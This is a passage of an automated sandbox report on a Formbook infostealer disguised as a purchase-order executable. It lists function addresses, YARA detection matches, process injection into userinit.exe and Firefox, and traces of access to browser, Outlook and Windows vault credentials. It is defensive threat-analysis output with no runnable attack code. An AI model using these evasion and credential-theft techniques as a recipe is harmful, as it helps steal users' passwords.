            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033469628_2_03346962
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033329A08_2_033329A0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033FA9A68_2_033FA9A6
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0333A8408_2_0333A840
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033328408_2_03332840
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033168B88_2_033168B8
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0335E8F08_2_0335E8F0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03350F308_2_03350F30
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033D2F308_2_033D2F30
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03372F288_2_03372F28
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033A4F408_2_033A4F40
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033AEFA08_2_033AEFA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0333CFE08_2_0333CFE0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03322FC88_2_03322FC8
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EEE268_2_033EEE26
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03330E598_2_03330E59
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03342E908_2_03342E90
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033ECE938_2_033ECE93
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EEEDB8_2_033EEEDB
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033CCD1F8_2_033CCD1F
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0333AD008_2_0333AD00
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03348DBF8_2_03348DBF
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0332ADE08_2_0332ADE0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03330C008_2_03330C00
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033D0CB58_2_033D0CB5
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03320CF28_2_03320CF2
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E132D8_2_033E132D
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0331D34C8_2_0331D34C
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0337739A8_2_0337739A
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033352A08_2_033352A0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033D12ED8_2_033D12ED
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0334B2C08_2_0334B2C0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0331F1728_2_0331F172
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033FB16B8_2_033FB16B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0336516C8_2_0336516C
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0333B1B08_2_0333B1B0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E70E98_2_033E70E9
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EF0E08_2_033EF0E0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033DF0CC8_2_033DF0CC
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033370C08_2_033370C0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EF7B08_2_033EF7B0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E16CC8_2_033E16CC
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E75718_2_033E7571
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033CD5B08_2_033CD5B0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EF43F8_2_033EF43F
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033214608_2_03321460
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EFB768_2_033EFB76
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0334FB808_2_0334FB80
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033A5BF08_2_033A5BF0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0336DBF98_2_0336DBF9
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033A3A6C8_2_033A3A6C
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EFA498_2_033EFA49
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E7A468_2_033E7A46
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033CDAAC8_2_033CDAAC
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03375AA08_2_03375AA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033D1AA38_2_033D1AA3
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033DDAC68_2_033DDAC6
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033C59108_2_033C5910
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033399508_2_03339950
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0334B9508_2_0334B950
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0339D8008_2_0339D800
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033338E08_2_033338E0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EFF098_2_033EFF09
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EFFB18_2_033EFFB1
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03331F928_2_03331F92
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03339EB08_2_03339EB0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E7D738_2_033E7D73
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E1D5A8_2_033E1D5A
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03333D408_2_03333D40
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0334FDC08_2_0334FDC0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033A9C328_2_033A9C32
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EFCF28_2_033EFCF2
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AB19708_2_00AB1970
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AAC86E8_2_00AAC86E
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AAC8708_2_00AAC870
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AACA908_2_00AACA90
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AAAB108_2_00AAAB10
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AB50408_2_00AB5040
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AB32208_2_00AB3220
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AB321B8_2_00AB321B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00ACB7108_2_00ACB710
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0323E3178_2_0323E317
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_032453448_2_03245344
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0323E7D08_2_0323E7D0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0323E59B8_2_0323E59B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0323E4348_2_0323E434
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0323CAD88_2_0323CAD8
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0323D8388_2_0323D838
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: String function: 01515130 appears 58 times
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: String function: 0155F290 appears 105 times
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: String function: 014CB970 appears 280 times
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: String function: 0154EA12 appears 86 times
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: String function: 01527E54 appears 103 times
            Source: C:\Windows\SysWOW64\userinit.exeCode function: String function: 03377E54 appears 102 times
            Source: C:\Windows\SysWOW64\userinit.exeCode function: String function: 033AF290 appears 105 times
            Source: C:\Windows\SysWOW64\userinit.exeCode function: String function: 0339EA12 appears 86 times
            Source: C:\Windows\SysWOW64\userinit.exeCode function: String function: 0331B970 appears 280 times
            Source: C:\Windows\SysWOW64\userinit.exeCode function: String function: 03365130 appears 58 times
            Source: PO-000001488.exe, 00000000.00000002.1603629112.000000000433B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO-000001488.exe
            Source: PO-000001488.exe, 00000000.00000002.1605918232.0000000007720000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO-000001488.exe
            Source: PO-000001488.exe, 00000000.00000002.1595450169.000000000116E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO-000001488.exe
            Source: PO-000001488.exe, 00000003.00000002.1769358600.0000000001047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUSERINIT.EXEj% vs PO-000001488.exe
            Source: PO-000001488.exe, 00000003.00000002.1769758693.00000000015CD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-000001488.exe
            Source: PO-000001488.exe, 00000003.00000002.1769358600.0000000001069000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUSERINIT.EXEj% vs PO-000001488.exe
            Source: PO-000001488.exeBinary or memory string: OriginalFilenameAEmo.exe2 vs PO-000001488.exe
            Source: PO-000001488.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.PO-000001488.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.PO-000001488.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: PO-000001488.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, O0UUP8i4yfT9fmLmQP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, UCmBvFDMba3C8pjQFg.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, UCmBvFDMba3C8pjQFg.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, UCmBvFDMba3C8pjQFg.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, O0UUP8i4yfT9fmLmQP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, UCmBvFDMba3C8pjQFg.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, UCmBvFDMba3C8pjQFg.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, UCmBvFDMba3C8pjQFg.csSecurity API names: _0020.AddAccessRule
            Source: userinit.exe, 00000008.00000002.3309629931.000000000391C000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.000000000316C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2107922191.0000000037FBC000.00000004.80000000.00040000.00000000.sdmp, PO-000001488.exeBinary or memory string: .vsmidi.sln
            Source: userinit.exe, 00000008.00000002.3309629931.000000000391C000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.000000000316C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2107922191.0000000037FBC000.00000004.80000000.00040000.00000000.sdmp, PO-000001488.exeBinary or memory string: .csproj;Hadouken.Properties.Resources
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@13/8
            Source: C:\Users\user\Desktop\PO-000001488.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-000001488.exe.logJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeMutant created: NULL
            Source: C:\Users\user\Desktop\PO-000001488.exeMutant created: \Sessions\1\BaseNamedObjects\vPwtiQvy
            Source: C:\Windows\SysWOW64\userinit.exeFile created: C:\Users\user\AppData\Local\Temp\A34E618MJump to behavior
            Source: PO-000001488.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: PO-000001488.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: userinit.exe, 00000008.00000003.2001252914.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.2000892094.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3307941539.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.2000839433.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.2001126306.0000000000D09000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3307941539.0000000000D09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO-000001488.exeReversingLabs: Detection: 65%
            Source: PO-000001488.exeString found in binary or memory: Bookmark-add
            Source: unknownProcess created: C:\Users\user\Desktop\PO-000001488.exe "C:\Users\user\Desktop\PO-000001488.exe"
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess created: C:\Users\user\Desktop\PO-000001488.exe "C:\Users\user\Desktop\PO-000001488.exe"
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeProcess created: C:\Windows\SysWOW64\userinit.exe "C:\Windows\SysWOW64\userinit.exe"
            Source: C:\Windows\SysWOW64\userinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess created: C:\Users\user\Desktop\PO-000001488.exe "C:\Users\user\Desktop\PO-000001488.exe"Jump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeProcess created: C:\Windows\SysWOW64\userinit.exe "C:\Windows\SysWOW64\userinit.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PO-000001488.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: PO-000001488.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MpfhURuSBZcuS.exe, 00000007.00000002.3307759780.00000000004BE000.00000002.00000001.01000000.0000000C.sdmp, MpfhURuSBZcuS.exe, 00000009.00000000.1835592215.00000000004BE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO-000001488.exe, 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.1769373657.0000000002F9D000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.1771308677.0000000003144000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO-000001488.exe, PO-000001488.exe, 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, userinit.exe, 00000008.00000003.1769373657.0000000002F9D000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.1771308677.0000000003144000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: userinit.pdb source: PO-000001488.exe, 00000003.00000002.1769358600.0000000001047000.00000004.00000020.00020000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000002.3308355650.0000000001168000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: userinit.pdbGCTL source: PO-000001488.exe, 00000003.00000002.1769358600.0000000001047000.00000004.00000020.00020000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000002.3308355650.0000000001168000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: PO-000001488.exe, Login.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
